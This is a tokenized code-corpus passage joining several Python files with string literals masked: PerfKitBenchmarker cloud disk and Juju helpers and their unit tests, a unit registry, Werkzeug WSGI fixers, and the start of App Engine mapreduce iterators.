posixpath . basename ( remote_path ) <EOL> tmp_path = posixpath . join ( vm_util . VM_TMP_DIR , file_name ) <EOL> self . ContainerCopy ( file_name , remote_path , copy_to ) <EOL> self . RemoteHostCopy ( file_path , tmp_path , copy_to ) <EOL> def MoveFile ( self , target , source_path , remote_path = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> file_name = posixpath . basename ( source_path ) <EOL> self . ContainerCopy ( file_name , source_path , copy_to = False ) <EOL> source_host_path = posixpath . join ( vm_util . VM_TMP_DIR , file_name ) <EOL> target_host_dir = vm_util . VM_TMP_DIR <EOL> self . MoveHostFile ( target , source_host_path , target_host_dir ) <EOL> target . ContainerCopy ( file_name , remote_path ) <EOL> class JujuMixin ( DebianMixin ) : <EOL> """<STR_LIT>""" <EOL> OS_TYPE = os_types . JUJU <EOL> is_controller = False <EOL> controller = None <EOL> vm_group = None <EOL> machines = { } <EOL> units = [ ] <EOL> installation_lock = threading . Lock ( ) <EOL> environments_yaml = """<STR_LIT>""" <EOL> def _Bootstrap ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> def JujuAddMachine ( self , unit ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' % <EOL> unit . internal_ip ) <EOL> machine_id = _ [ _ . rindex ( '<STR_LIT:U+0020>' ) : ] . strip ( ) <EOL> self . machines [ machine_id ] = unit <EOL> def JujuConfigureEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_controller : <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> with vm_util . NamedTemporaryFile ( ) as tf : <EOL> tf . write ( self . environments_yaml . format ( self . internal_ip ) ) <EOL> tf . close ( ) <EOL> self . PushFile ( tf . name , '<STR_LIT>' ) <EOL> def JujuEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> return output . strip ( ) <EOL> def JujuRun ( self , cmd ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( cmd ) <EOL> return output . strip ( ) <EOL> def JujuStatus ( self , pattern = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( '<STR_LIT>' % <EOL> pattern ) <EOL> return output . strip ( ) <EOL> def JujuVersion ( self ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> return output . strip ( ) <EOL> def JujuSet ( self , service , params = [ ] ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' % ( service , '<STR_LIT:U+0020>' . join ( params ) ) ) <EOL> return output . strip ( ) <EOL> @ vm_util . Retry ( poll_interval = <NUM_LIT:30> , timeout = <NUM_LIT> ) <EOL> def JujuWait ( self ) : <EOL> """<STR_LIT>""" <EOL> status = yaml . load ( self . JujuStatus ( ) ) <EOL> for service in status [ '<STR_LIT>' ] : <EOL> ss = status [ '<STR_LIT>' ] [ service ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if ss not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise errors . Juju . TimeoutException ( <EOL> '<STR_LIT>' % ( service , ss ) ) <EOL> if ss in [ '<STR_LIT:error>' ] : <EOL> debuglog = self . JujuRun ( '<STR_LIT>' ) <EOL> logging . warn ( debuglog ) <EOL> raise errors . Juju . UnitErrorException ( <EOL> '<STR_LIT>' % service ) <EOL> for unit in status [ '<STR_LIT>' ] [ service ] [ '<STR_LIT>' ] : <EOL> unit_data = status [ '<STR_LIT>' ] [ service ] [ '<STR_LIT>' ] [ unit ] <EOL> ag = unit_data [ '<STR_LIT>' ] <EOL> if ag != '<STR_LIT>' : <EOL> raise errors . Juju . TimeoutException ( <EOL> '<STR_LIT>' % ( service , ag ) ) <EOL> ws = unit_data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if ws not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise errors . Juju . TimeoutException ( <EOL> '<STR_LIT>' % ( service , ws ) ) <EOL> def JujuDeploy ( self , charm , vm_group ) : <EOL> """<STR_LIT>""" <EOL> machines = [ ] <EOL> for machine_id , unit in self . machines . iteritems ( ) : <EOL> if unit . vm_group == vm_group : <EOL> machines . append ( machine_id ) <EOL> resp , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' % ( charm , machines . pop ( ) ) ) <EOL> service = charm [ charm . rindex ( '<STR_LIT:/>' ) + <NUM_LIT:1> : ] <EOL> for machine in machines : <EOL> resp , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' % ( service , machine ) ) <EOL> def JujuRelate ( self , service1 , service2 ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' % ( service1 , service2 ) ) <EOL> def Install ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> try : <EOL> with self . controller . installation_lock : <EOL> if package_name not in self . controller . _installed_packages : <EOL> package . JujuInstall ( self . controller , self . vm_group ) <EOL> self . controller . _installed_packages . add ( package_name ) <EOL> except AttributeError as e : <EOL> logging . warn ( '<STR_LIT>' <EOL> % ( package_name , e ) ) <EOL> if package_name not in self . _installed_packages : <EOL> package . AptInstall ( self ) <EOL> self . _installed_packages . add ( package_name ) <EOL> def SetupPackageManager ( self ) : <EOL> if self . is_controller : <EOL> resp , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' <EOL> ) <EOL> super ( JujuMixin , self ) . SetupPackageManager ( ) <EOL> def PrepareVMEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( JujuMixin , self ) . PrepareVMEnvironment ( ) <EOL> if self . is_controller : <EOL> self . InstallPackages ( '<STR_LIT>' ) <EOL> self . JujuConfigureEnvironment ( ) <EOL> self . AuthenticateVm ( ) <EOL> self . _Bootstrap ( ) <EOL> for unit in self . units : <EOL> unit . controller = self <EOL> self . JujuAddMachine ( unit ) </s>
<s> """<STR_LIT>""" <EOL> import string <EOL> import logging <EOL> from perfkitbenchmarker import disk <EOL> from perfkitbenchmarker import vm_util <EOL> from perfkitbenchmarker import flags <EOL> from perfkitbenchmarker . providers . cloudstack import util <EOL> FLAGS = flags . FLAGS <EOL> class CloudStackDisk ( disk . BaseDisk ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , disk_spec , name , zone_id , project_id = None ) : <EOL> super ( CloudStackDisk , self ) . __init__ ( disk_spec ) <EOL> self . cs = util . CsClient ( <EOL> FLAGS . CS_API_URL , <EOL> FLAGS . CS_API_KEY , <EOL> FLAGS . CS_API_SECRET <EOL> ) <EOL> self . attached_vm_name = None <EOL> self . attached_vm_id = None <EOL> self . name = name <EOL> self . zone_id = zone_id <EOL> self . project_id = project_id <EOL> self . disk_offering_id = self . _GetBestOfferingId ( self . disk_size ) <EOL> assert self . disk_offering_id , "<STR_LIT>" <EOL> if disk_spec . disk_type : <EOL> logging . warn ( "<STR_LIT>" ) <EOL> @ vm_util . Retry ( max_retries = <NUM_LIT:3> ) <EOL> def _Create ( self ) : <EOL> """<STR_LIT>""" <EOL> volume = self . cs . create_volume ( self . name , <EOL> self . disk_offering_id , <EOL> self . zone_id , <EOL> self . project_id ) <EOL> assert volume , "<STR_LIT>" <EOL> self . volume_id = volume [ '<STR_LIT:id>' ] <EOL> self . disk_type = volume [ '<STR_LIT:type>' ] <EOL> self . actual_disk_size = int ( volume [ '<STR_LIT:size>' ] ) / ( <NUM_LIT:2> ** <NUM_LIT:30> ) <EOL> def _Delete ( self ) : <EOL> """<STR_LIT>""" <EOL> vol = self . cs . get_volume ( self . name , self . project_id ) <EOL> if vol : <EOL> self . cs . delete_volume ( self . volume_id ) <EOL> def _Exists ( self ) : <EOL> """<STR_LIT>""" <EOL> vol = self . cs . get_volume ( self . name , self . project_id ) <EOL> if vol : <EOL> return True <EOL> return False <EOL> @ vm_util . Retry ( max_retries = <NUM_LIT:3> ) <EOL> def Attach ( self , vm ) : <EOL> """<STR_LIT>""" <EOL> res = self . cs . attach_volume ( self . volume_id , vm . id ) <EOL> assert res , "<STR_LIT>" <EOL> self . device_id = res [ '<STR_LIT>' ] <EOL> self . device_path = "<STR_LIT>" + str ( string . ascii_lowercase [ self . device_id ] ) <EOL> def Detach ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cs . detach_volume ( self . volume_id ) <EOL> def _GetBestOfferingId ( self , disk_size ) : <EOL> """<STR_LIT>""" <EOL> disk_offerings = self . cs . list_disk_offerings ( ) <EOL> sorted_do = sorted ( disk_offerings , key = lambda x : x [ '<STR_LIT>' ] ) <EOL> for do in sorted_do : <EOL> if int ( do [ '<STR_LIT>' ] ) >= disk_size : <EOL> return do [ '<STR_LIT:id>' ] <EOL> return None </s>
<s> import logging <EOL> import time <EOL> from perfkitbenchmarker import errors <EOL> from perfkitbenchmarker import flags <EOL> from perfkitbenchmarker import disk <EOL> from perfkitbenchmarker . providers . openstack import utils as os_utils <EOL> FLAGS = flags . FLAGS <EOL> class OpenStackDisk ( disk . BaseDisk ) : <EOL> def __init__ ( self , disk_spec , name , zone , image = None ) : <EOL> super ( OpenStackDisk , self ) . __init__ ( disk_spec ) <EOL> self . __nclient = os_utils . NovaClient ( ) <EOL> self . attached_vm_name = None <EOL> self . attached_vm_id = - <NUM_LIT:1> <EOL> self . image = image <EOL> self . name = name <EOL> self . zone = zone <EOL> self . device = None <EOL> self . _disk = None <EOL> def _Create ( self ) : <EOL> self . _disk = self . __nclient . volumes . create ( self . disk_size , <EOL> display_name = self . name , <EOL> availability_zone = self . zone , <EOL> imageRef = self . image , <EOL> ) <EOL> is_unavailable = True <EOL> while is_unavailable : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> volume = self . __nclient . volumes . get ( self . _disk . id ) <EOL> if volume : <EOL> is_unavailable = not ( volume . status == "<STR_LIT>" ) <EOL> self . _disk = volume <EOL> def _Delete ( self ) : <EOL> from novaclient . exceptions import NotFound <EOL> if self . _disk is None : <EOL> logging . info ( '<STR_LIT>' <EOL> % self . name ) <EOL> return <EOL> sleep = <NUM_LIT:1> <EOL> sleep_count = <NUM_LIT:0> <EOL> try : <EOL> self . __nclient . volumes . delete ( self . _disk ) <EOL> is_deleted = False <EOL> while not is_deleted : <EOL> volume = self . __nclient . volumes . get ( self . _disk . id ) <EOL> is_deleted = volume is None <EOL> time . sleep ( sleep ) <EOL> sleep_count += <NUM_LIT:1> <EOL> if sleep_count == <NUM_LIT:10> : <EOL> sleep = <NUM_LIT:5> <EOL> except NotFound : <EOL> logging . info ( '<STR_LIT>' <EOL> % self . _disk . id ) <EOL> def _Exists ( self ) : <EOL> from novaclient . exceptions import NotFound <EOL> try : <EOL> volume = self . __nclient . volumes . get ( self . _disk . id ) <EOL> return volume and volume . status in ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , ) <EOL> except NotFound : <EOL> return False <EOL> def Attach ( self , vm ) : <EOL> self . attached_vm_name = vm . name <EOL> self . attached_vm_id = vm . id <EOL> result = self . __nclient . volumes . create_server_volume ( vm . id , <EOL> self . _disk . id , <EOL> self . device ) <EOL> self . attach_id = result . id <EOL> volume = None <EOL> is_unattached = True <EOL> while is_unattached : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> volume = self . __nclient . volumes . get ( result . id ) <EOL> if volume : <EOL> is_unattached = not ( volume . status == "<STR_LIT>" <EOL> and volume . attachments ) <EOL> for attachment in volume . attachments : <EOL> if self . attach_id == attachment . get ( '<STR_LIT>' ) : <EOL> self . device = attachment . get ( '<STR_LIT>' ) <EOL> return <EOL> raise errors . Error ( "<STR_LIT>" % vm . name ) <EOL> def GetDevicePath ( self ) : <EOL> return self . device <EOL> def Detach ( self ) : <EOL> self . __nclient . volumes . delete_server_volume ( self . attached_vm_id , <EOL> self . attach_id ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import copy_reg <EOL> import numbers <EOL> import pint <EOL> class _UnitRegistry ( pint . UnitRegistry ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( _UnitRegistry , self ) . __init__ ( ) <EOL> self . define ( '<STR_LIT>' ) <EOL> self . define ( '<STR_LIT>' ) <EOL> def parse_expression ( self , input_string , * args , ** kwargs ) : <EOL> result = super ( _UnitRegistry , self ) . parse_expression ( input_string , * args , <EOL> ** kwargs ) <EOL> if ( isinstance ( result , numbers . Number ) and <EOL> input_string . strip ( ) . endswith ( '<STR_LIT:%>' ) ) : <EOL> return self . Quantity ( result , self . Unit ( '<STR_LIT>' ) ) <EOL> return result <EOL> _UNIT_REGISTRY = _UnitRegistry ( ) <EOL> def _PickleQuantity ( q ) : <EOL> return _UnPickleQuantity , ( q . to_tuple ( ) , ) <EOL> def _UnPickleQuantity ( inp ) : <EOL> return _UNIT_REGISTRY . Quantity . from_tuple ( inp ) <EOL> copy_reg . pickle ( _UNIT_REGISTRY . Quantity , _PickleQuantity ) <EOL> def _unit_deepcopy ( self , memo ) : <EOL> ret = self . __class__ ( copy . deepcopy ( self . _units ) ) <EOL> return ret <EOL> _UNIT_REGISTRY . Unit . __deepcopy__ = _unit_deepcopy <EOL> _UNIT_REGISTRY . Unit . __ne__ = lambda self , other : not self . __eq__ ( other ) <EOL> DimensionalityError = pint . DimensionalityError <EOL> ParseExpression = _UNIT_REGISTRY . parse_expression <EOL> Quantity = _UNIT_REGISTRY . Quantity <EOL> Unit = _UNIT_REGISTRY . Unit <EOL> byte = Unit ( '<STR_LIT>' ) <EOL> bit = Unit ( '<STR_LIT>' ) <EOL> second = Unit ( '<STR_LIT>' ) <EOL> percent = Unit ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import mock <EOL> from perfkitbenchmarker import benchmark_spec <EOL> from perfkitbenchmarker import context <EOL> from perfkitbenchmarker import disk <EOL> from perfkitbenchmarker import virtual_machine <EOL> from perfkitbenchmarker . configs import benchmark_config_spec <EOL> from perfkitbenchmarker . providers . aws import aws_disk <EOL> from perfkitbenchmarker . providers . aws import aws_virtual_machine <EOL> from perfkitbenchmarker . providers . azure import azure_disk <EOL> from perfkitbenchmarker . providers . azure import flags as azure_flags <EOL> from perfkitbenchmarker . providers . azure import azure_virtual_machine <EOL> from perfkitbenchmarker . providers . gcp import gce_disk <EOL> from tests import mock_flags <EOL> _BENCHMARK_NAME = '<STR_LIT:name>' <EOL> _BENCHMARK_UID = '<STR_LIT>' <EOL> _COMPONENT = '<STR_LIT>' <EOL> class _DiskMetadataTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . addCleanup ( context . SetThreadBenchmarkSpec , None ) <EOL> config_spec = benchmark_config_spec . BenchmarkConfigSpec ( <EOL> _BENCHMARK_NAME , flag_values = mock_flags . MockFlags ( ) , vm_groups = { } ) <EOL> self . benchmark_spec = benchmark_spec . BenchmarkSpec ( <EOL> config_spec , _BENCHMARK_NAME , _BENCHMARK_UID ) <EOL> class GcpDiskMetadataTest ( _DiskMetadataTestCase ) : <EOL> def testPDStandard ( self ) : <EOL> disk_spec = disk . BaseDiskSpec ( _COMPONENT , disk_size = <NUM_LIT:2> , <EOL> disk_type = gce_disk . PD_STANDARD ) <EOL> disk_obj = gce_disk . GceDisk ( disk_spec , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( disk_obj . metadata , <EOL> { disk . MEDIA : disk . HDD , <EOL> disk . REPLICATION : disk . ZONE , <EOL> disk . LEGACY_DISK_TYPE : disk . STANDARD } ) <EOL> class AwsDiskMetadataTest ( _DiskMetadataTestCase ) : <EOL> def doAwsDiskTest ( self , disk_type , machine_type , <EOL> goal_media , goal_replication , goal_legacy_disk_type ) : <EOL> disk_spec = aws_disk . AwsDiskSpec ( _COMPONENT , disk_size = <NUM_LIT:2> , <EOL> disk_type = disk_type ) <EOL> vm_spec = virtual_machine . BaseVmSpec ( <EOL> '<STR_LIT>' , zone = '<STR_LIT>' , machine_type = machine_type ) <EOL> vm = aws_virtual_machine . DebianBasedAwsVirtualMachine ( <EOL> vm_spec ) <EOL> vm . CreateScratchDisk ( disk_spec ) <EOL> self . assertEqual ( vm . scratch_disks [ <NUM_LIT:0> ] . metadata , <EOL> { disk . MEDIA : goal_media , <EOL> disk . REPLICATION : goal_replication , <EOL> disk . LEGACY_DISK_TYPE : goal_legacy_disk_type } ) <EOL> def testLocalSSD ( self ) : <EOL> self . doAwsDiskTest ( <EOL> disk . LOCAL , <EOL> '<STR_LIT>' , <EOL> disk . SSD , <EOL> disk . NONE , <EOL> disk . LOCAL ) <EOL> def testLocalHDD ( self ) : <EOL> self . doAwsDiskTest ( <EOL> disk . LOCAL , <EOL> '<STR_LIT>' , <EOL> disk . HDD , <EOL> disk . NONE , <EOL> disk . LOCAL ) <EOL> class AzureDiskMetadataTest ( _DiskMetadataTestCase ) : <EOL> def doAzureDiskTest ( self , storage_type , disk_type , machine_type , <EOL> goal_media , goal_replication , goal_legacy_disk_type ) : <EOL> with mock . patch ( azure_disk . __name__ + '<STR_LIT>' ) as disk_flags : <EOL> disk_flags . azure_storage_type = storage_type <EOL> disk_spec = disk . BaseDiskSpec ( _COMPONENT , disk_size = <NUM_LIT:2> , <EOL> disk_type = disk_type ) <EOL> vm_spec = virtual_machine . BaseVmSpec ( <EOL> '<STR_LIT>' , zone = '<STR_LIT>' , machine_type = machine_type ) <EOL> vm = azure_virtual_machine . DebianBasedAzureVirtualMachine ( <EOL> vm_spec ) <EOL> azure_disk . AzureDisk . Create = mock . Mock ( ) <EOL> azure_disk . AzureDisk . Attach = mock . Mock ( ) <EOL> vm . CreateScratchDisk ( disk_spec ) <EOL> self . assertEqual ( vm . scratch_disks [ <NUM_LIT:0> ] . metadata , <EOL> { disk . MEDIA : goal_media , <EOL> disk . REPLICATION : goal_replication , <EOL> disk . LEGACY_DISK_TYPE : goal_legacy_disk_type } ) <EOL> def testPremiumStorage ( self ) : <EOL> self . doAzureDiskTest ( azure_flags . PLRS , <EOL> azure_disk . PREMIUM_STORAGE , <EOL> '<STR_LIT>' , <EOL> disk . SSD , <EOL> disk . ZONE , <EOL> disk . REMOTE_SSD ) <EOL> def testStandardDisk ( self ) : <EOL> self . doAzureDiskTest ( azure_flags . ZRS , <EOL> azure_disk . STANDARD_DISK , <EOL> '<STR_LIT>' , <EOL> disk . HDD , <EOL> disk . REGION , <EOL> disk . STANDARD ) <EOL> def testLocalHDD ( self ) : <EOL> self . doAzureDiskTest ( azure_flags . LRS , <EOL> disk . LOCAL , <EOL> '<STR_LIT>' , <EOL> disk . HDD , <EOL> disk . NONE , <EOL> disk . LOCAL ) <EOL> def testLocalSSD ( self ) : <EOL> self . doAzureDiskTest ( azure_flags . LRS , <EOL> disk . LOCAL , <EOL> '<STR_LIT>' , <EOL> disk . SSD , <EOL> disk . NONE , <EOL> disk . LOCAL ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import mock <EOL> import unittest <EOL> import time <EOL> from perfkitbenchmarker . linux_benchmarks import object_storage_service_benchmark <EOL> from tests import mock_flags <EOL> class TestBuildCommands ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> mocked_flags = mock_flags . PatchTestCaseFlags ( self ) <EOL> mocked_flags . object_storage_scenario = '<STR_LIT>' <EOL> mocked_flags . object_storage_multistream_objects_per_stream = <NUM_LIT:100> <EOL> mocked_flags . object_storage_object_sizes = { '<STR_LIT>' : '<STR_LIT>' } <EOL> mocked_flags . object_storage_multistream_num_streams = <NUM_LIT:10> <EOL> def testBuildCommands ( self ) : <EOL> vm = mock . MagicMock ( ) <EOL> vm . RobustRemoteCommand = mock . MagicMock ( return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> with mock . patch ( time . __name__ + '<STR_LIT>' , return_value = <NUM_LIT:1.0> ) : <EOL> with mock . patch ( object_storage_service_benchmark . __name__ + <EOL> '<STR_LIT>' ) : <EOL> object_storage_service_benchmark . ApiBasedBenchmarks ( <EOL> [ ] , { } , vm , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> vm . RobustRemoteCommand . call_args_list [ <NUM_LIT:0> ] , <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> should_log = True ) ) <EOL> self . assertEqual ( <EOL> vm . RobustRemoteCommand . call_args_list [ <NUM_LIT:1> ] , <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> should_log = True ) ) <EOL> class TestDistributionToBackendFormat ( unittest . TestCase ) : <EOL> def testPointDistribution ( self ) : <EOL> dist = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertEqual ( <EOL> object_storage_service_benchmark . _DistributionToBackendFormat ( dist ) , <EOL> { <NUM_LIT> : <NUM_LIT> } ) <EOL> def testMultiplePointsDistribution ( self ) : <EOL> dist = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertEqual ( <EOL> object_storage_service_benchmark . _DistributionToBackendFormat ( dist ) , <EOL> { <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:4> : <NUM_LIT> } ) <EOL> def testAbbreviatedPointDistribution ( self ) : <EOL> dist = '<STR_LIT>' <EOL> self . assertEqual ( <EOL> object_storage_service_benchmark . _DistributionToBackendFormat ( dist ) , <EOL> { <NUM_LIT> : <NUM_LIT> } ) <EOL> def testBadPercentages ( self ) : <EOL> dist = { '<STR_LIT>' : '<STR_LIT>' } <EOL> with self . assertRaises ( ValueError ) : <EOL> object_storage_service_benchmark . _DistributionToBackendFormat ( dist ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import site <EOL> import os . path <EOL> import sys <EOL> def add ( folder , index = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> site_dir = os . path . join ( folder , '<STR_LIT>' , '<STR_LIT>' + sys . version [ : <NUM_LIT:3> ] , '<STR_LIT>' ) <EOL> if os . path . exists ( site_dir ) : <EOL> folder = site_dir <EOL> else : <EOL> folder = os . path . join ( os . path . dirname ( __file__ ) , folder ) <EOL> sys . path , remainder = sys . path [ : <NUM_LIT:1> ] , sys . path [ <NUM_LIT:1> : ] <EOL> site . addsitedir ( folder ) <EOL> sys . path . extend ( remainder ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from urllib import unquote <EOL> except ImportError : <EOL> from urllib . parse import unquote <EOL> from werkzeug . http import parse_options_header , parse_cache_control_header , parse_set_header <EOL> from werkzeug . useragents import UserAgent <EOL> from werkzeug . datastructures import Headers , ResponseCacheControl <EOL> class CGIRootFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , app_root = '<STR_LIT:/>' ) : <EOL> self . app = app <EOL> self . app_root = app_root <EOL> def __call__ ( self , environ , start_response ) : <EOL> if '<STR_LIT>' not in environ or environ [ '<STR_LIT>' ] < '<STR_LIT>' : <EOL> environ [ '<STR_LIT>' ] = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) + environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> environ [ '<STR_LIT>' ] = self . app_root . strip ( '<STR_LIT:/>' ) <EOL> return self . app ( environ , start_response ) <EOL> LighttpdCGIRootFix = CGIRootFix <EOL> class PathInfoFromRequestUriFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app ) : <EOL> self . app = app <EOL> def __call__ ( self , environ , start_response ) : <EOL> for key in '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' : <EOL> if key not in environ : <EOL> continue <EOL> request_uri = unquote ( environ [ key ] ) <EOL> script_name = unquote ( environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if request_uri . startswith ( script_name ) : <EOL> environ [ '<STR_LIT>' ] = request_uri [ len ( script_name ) : ] . split ( '<STR_LIT:?>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> break <EOL> return self . app ( environ , start_response ) <EOL> class ProxyFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , num_proxies = <NUM_LIT:1> ) : <EOL> self . app = app <EOL> self . num_proxies = num_proxies <EOL> def get_remote_addr ( self , forwarded_for ) : <EOL> """<STR_LIT>""" <EOL> if len ( forwarded_for ) >= self . num_proxies : <EOL> return forwarded_for [ - <NUM_LIT:1> * self . num_proxies ] <EOL> def __call__ ( self , environ , start_response ) : <EOL> getter = environ . get <EOL> forwarded_proto = getter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> forwarded_for = getter ( '<STR_LIT>' , '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) <EOL> forwarded_host = getter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> environ . update ( { <EOL> '<STR_LIT>' : getter ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : getter ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : getter ( '<STR_LIT>' ) <EOL> } ) <EOL> forwarded_for = [ x for x in [ x . strip ( ) for x in forwarded_for ] if x ] <EOL> remote_addr = self . get_remote_addr ( forwarded_for ) <EOL> if remote_addr is not None : <EOL> environ [ '<STR_LIT>' ] = remote_addr <EOL> if forwarded_host : <EOL> environ [ '<STR_LIT>' ] = forwarded_host <EOL> if forwarded_proto : <EOL> environ [ '<STR_LIT>' ] = forwarded_proto <EOL> return self . app ( environ , start_response ) <EOL> class HeaderRewriterFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , remove_headers = None , add_headers = None ) : <EOL> self . app = app <EOL> self . remove_headers = set ( x . lower ( ) for x in ( remove_headers or ( ) ) ) <EOL> self . add_headers = list ( add_headers or ( ) ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> def rewriting_start_response ( status , headers , exc_info = None ) : <EOL> new_headers = [ ] <EOL> for key , value in headers : <EOL> if key . lower ( ) not in self . remove_headers : <EOL> new_headers . append ( ( key , value ) ) <EOL> new_headers += self . add_headers <EOL> return start_response ( status , new_headers , exc_info ) <EOL> return self . app ( environ , rewriting_start_response ) <EOL> class InternetExplorerFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , fix_vary = True , fix_attach = True ) : <EOL> self . app = app <EOL> self . fix_vary = fix_vary <EOL> self . fix_attach = fix_attach <EOL> def fix_headers ( self , environ , headers , status = None ) : <EOL> if self . fix_vary : <EOL> header = headers . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mimetype , options = parse_options_header ( header ) <EOL> if mimetype not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> headers . pop ( '<STR_LIT>' , None ) <EOL> if self . fix_attach and '<STR_LIT>' in headers : <EOL> pragma = parse_set_header ( headers . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> pragma . discard ( '<STR_LIT>' ) <EOL> header = pragma . to_header ( ) <EOL> if not header : <EOL> headers . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> headers [ '<STR_LIT>' ] = header <EOL> header = headers . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if header : <EOL> cc = parse_cache_control_header ( header , <EOL> cls = ResponseCacheControl ) <EOL> cc . no_cache = None <EOL> cc . no_store = False <EOL> header = cc . to_header ( ) <EOL> if not header : <EOL> headers . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> headers [ '<STR_LIT>' ] = header <EOL> def run_fixed ( self , environ , start_response ) : <EOL> def fixing_start_response ( status , headers , exc_info = None ) : <EOL> headers = Headers ( headers ) <EOL> self . fix_headers ( environ , headers , status ) <EOL> return start_response ( status , headers . to_wsgi_list ( ) , exc_info ) <EOL> return self . app ( environ , fixing_start_response ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> ua = UserAgent ( environ ) <EOL> if ua . browser != '<STR_LIT>' : <EOL> return self . app ( environ , start_response ) <EOL> return self . run_fixed ( environ , start_response ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> from google . appengine . datastore import datastore_query <EOL> from google . appengine . datastore import datastore_rpc <EOL> from google . appengine . ext import db <EOL> from google . appengine . ext import key_range <EOL> from mapreduce import json_util <EOL> from mapreduce import key_ranges <EOL> from mapreduce import model <EOL> from mapreduce import namespace_range <EOL> from mapreduce import property_range <EOL> from mapreduce import util <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> class RangeIteratorFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def create_property_range_iterator ( cls , <EOL> p_range , <EOL> ns_range , <EOL> query_spec ) : <EOL> """<STR_LIT>""" <EOL> return _PropertyRangeModelIterator ( p_range , <EOL> ns_range , <EOL> query_spec ) <EOL> @ classmethod <EOL> def create_multi_property_range_iterator ( cls , <EOL> p_range_iters ) : <EOL> """<STR_LIT>""" <EOL> return _MultiPropertyRangeModelIterator ( p_range_iters ) <EOL> @ classmethod <EOL> def create_key_ranges_iterator 